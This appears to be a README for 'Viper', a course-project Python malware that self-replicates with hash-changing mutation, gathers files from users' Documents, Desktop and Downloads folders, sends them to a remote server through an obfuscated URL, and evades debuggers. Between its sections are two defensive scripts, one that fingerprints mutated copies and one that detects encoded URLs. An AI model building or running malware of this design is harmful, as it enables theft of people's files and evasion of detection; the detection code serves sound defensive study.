Viper is a sophisticated multi-platform malware developed for educational and penetration testing purposes as part of UWA's Penetration Testing course. Designed to operate across Windows, Linux, and macOS, Viper showcases various malware techniques such as operating system detection, virus-like behaviour, mutation for evasion, data exfiltration, and anti-debugging mechanisms. Read the full writeup
Disclaimer: This project is for educational purposes only.
- Cross-platform compatibility (Windows, Linux, macOS)
- OS detection and customised behaviour
- Virus-like replication and mutation
- Stealthy data exfiltration to a remote server
- Anti-debugging measures
- Minimal user disruption to maintain stealth
- Clone the repository:

```shell
git clone https://github.com/beugo/viper.git
cd viper
```

- Install the required dependencies:

```shell
pip install -r requirements.txt
```
Viper detects the target operating system using Python's `platform` module and adapts its behaviour accordingly:

- Windows: Uses `ctypes` for pop-up messages and anti-debugging mechanisms.
- Linux: Utilises `Zenity` or `Tkinter` for displaying infection alerts.
- macOS: Uses `osascript` to display pop-ups via AppleScript.
Viper replicates itself across Python files in the current directory and subdirectories. It employs a simple mutation mechanism to modify its genetic sequence, changing its hash with each replication to evade detection by antivirus software.
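The replication section above makes the point that rewriting an embedded constant changes the file hash on every copy, which is exactly why signature matching on whole-file hashes fails. The following is an added example from the defender's side, not code from the Viper project: it fingerprints Python files on their syntax tree with every literal replaced by a type placeholder, so copies that differ only in the mutated constant, comments or whitespace collapse to the same fingerprint, and it adds an AST-shingle similarity score that still flags copies into which junk statements were inserted. The four source strings (`ORIGINAL`, `MUTATED`, `JUNK`, `UNRELATED`) are constructed samples of harmless code, and the function names are this example's own.

```python
import ast
import hashlib


class ConstantNormaliser(ast.NodeTransformer):
    """Replace every literal with a placeholder naming its type, so two copies
    that differ only in an embedded string, byte string or number look identical."""

    def visit_Constant(self, node: ast.Constant) -> ast.AST:
        placeholder = ast.Constant(value=type(node.value).__name__)
        return ast.copy_location(placeholder, node)


def file_hash(source: str) -> str:
    """Plain content hash: what a signature-based scanner compares."""
    return hashlib.sha256(source.encode()).hexdigest()


def structural_fingerprint(source: str) -> str:
    """Hash of the constant-normalised AST; comments and spacing never reach the AST."""
    tree = ConstantNormaliser().visit(ast.parse(source))
    dump = ast.dump(tree, annotate_fields=False, include_attributes=False)
    return hashlib.sha256(dump.encode()).hexdigest()


def node_shingles(source: str, n: int = 3) -> set:
    """Set of n-grams over the node-kind sequence of a breadth-first AST walk."""
    kinds = [type(node).__name__ for node in ast.walk(ast.parse(source))]
    return {tuple(kinds[i:i + n]) for i in range(len(kinds) - n + 1)}


def similarity(a: str, b: str) -> float:
    """Jaccard similarity of the two shingle sets: 1.0 means identical structure."""
    sa, sb = node_shingles(a), node_shingles(b)
    if not sa and not sb:
        return 1.0
    return len(sa & sb) / len(sa | sb)


# Constructed samples. ORIGINAL and MUTATED differ only in a comment, blank
# lines and the value of the MARKER constant, which is the kind of change that
# flips a file hash. JUNK additionally has a do-nothing statement appended.
ORIGINAL = '''
import os

MARKER = "seed-1"

def scan(path):
    hits = []
    for name in os.listdir(path):
        if name.endswith(".py"):
            hits.append(name)
    return hits
'''

MUTATED = '''
import os   # comment inserted by the mutation step
MARKER = "seed-2"
def scan(path):
    hits = []
    for name in os.listdir(path):
        if name.endswith(".py"):
            hits.append(name)
    return hits
'''

JUNK = ORIGINAL + "_pad = 4\n"

UNRELATED = '''
def add(a, b):
    return a + b
'''


def report() -> dict:
    """Summarise how each comparison method treats the constructed samples."""
    return {
        "hash_matches_mutated": file_hash(ORIGINAL) == file_hash(MUTATED),
        "fingerprint_matches_mutated": structural_fingerprint(ORIGINAL) == structural_fingerprint(MUTATED),
        "fingerprint_matches_junk": structural_fingerprint(ORIGINAL) == structural_fingerprint(JUNK),
        "similarity_mutated": similarity(ORIGINAL, MUTATED),
        "similarity_junk": similarity(ORIGINAL, JUNK),
        "similarity_unrelated": similarity(ORIGINAL, UNRELATED),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

The structural fingerprint is an exact-match tool: it catches constant rewrites for free but breaks as soon as a copy gains or loses a statement, which is what the similarity score is for. In practice a hunt over a directory tree would cluster files whose similarity exceeds a threshold and review the clusters, rather than relying on either number alone.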
Viper stealthily collects files from the following directories:

- Windows: `Documents`, `Desktop`, `Downloads`
- Linux/macOS: `~/Documents`, `~/Desktop`, `~/Downloads`
The files are then sent to a remote server via an obfuscated URL using the requests library.
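Two things in the collection and exfiltration description are useful static indicators: a URL that has been obfuscated rather than written out, and string literals naming the user document directories next to an outbound `requests` call. The following is an added triage script, not part of the Viper project, that walks a Python file's AST, decodes base64-looking string literals and reports those that turn into URLs, records `requests.get`/`post`/`put` calls with their line numbers, and notes literals that mention the directories listed above. The scoring rule, the `SUSPECT` and `BENIGN` source strings and the function names are all this example's own constructions; the suspect sample only lists file names so that the script itself does nothing harmful when read.

```python
import ast
import base64
import binascii
import re

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
SENSITIVE_DIRS = ("Documents", "Desktop", "Downloads")
HTTP_METHODS = {"get", "post", "put"}


def decode_if_url(text: str):
    """Return the URL hidden in a base64 string literal, or None if it is not one."""
    if not B64_RE.match(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if URL_RE.match(decoded) else None


def find_indicators(source: str) -> dict:
    """Collect static indicators from one Python source file."""
    found = {"plain_urls": [], "decoded_urls": [], "http_calls": [], "sensitive_paths": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if URL_RE.match(node.value):
                found["plain_urls"].append(node.value)
            elif (url := decode_if_url(node.value)):
                found["decoded_urls"].append(url)
            elif any(d in node.value for d in SENSITIVE_DIRS):
                found["sensitive_paths"].append(node.value)
        elif (isinstance(node, ast.Call)
              and isinstance(node.func, ast.Attribute)
              and node.func.attr in HTTP_METHODS
              and isinstance(node.func.value, ast.Name)
              and node.func.value.id == "requests"):
            found["http_calls"].append((node.func.attr, node.lineno))
    return found


def risk_score(found: dict) -> int:
    """Constructed scoring rule: plaintext URLs and ordinary HTTP calls are normal,
    an obfuscated URL and the read-user-files-then-send pairing are what stand out."""
    score = 0
    if found["decoded_urls"]:
        score += 2
    if found["sensitive_paths"]:
        score += 1
    if found["http_calls"] and found["sensitive_paths"]:
        score += 1
    return score


# Constructed samples. The encoded literal is built here rather than typed in so
# the example never carries a hand-written blob.
_ENCODED = base64.b64encode(b"https://example.com/upload").decode()

SUSPECT = f'''
import base64, os, requests
TARGET = base64.b64decode("{_ENCODED}").decode()
names = os.listdir(os.path.expanduser("~/Documents"))
requests.post(TARGET, json=names)
'''

BENIGN = '''
import requests
resp = requests.get("https://example.com/status")
print(resp.status_code)
'''


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        indicators = find_indicators(src)
        print(label, risk_score(indicators), indicators)
```

The base64 check is deliberately strict (alphabet, padding and a minimum length) so that ordinary identifiers and short tokens are not decoded, and it only reports a hit when the decoded bytes are valid UTF-8 that starts with a URL scheme. Hex-encoded or XOR-masked URLs would need a further decoder of the same shape.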
On Windows, Viper includes anti-debugging measures that terminate the malware if a debugger is detected. It also implements a time-based exit to prevent extended analysis using tools like GDB.
Run the malware using Python:

```shell
python viper.py
```

Ensure you have the necessary permissions to execute the script, especially on Linux/macOS systems:

```shell
chmod +x viper.py
```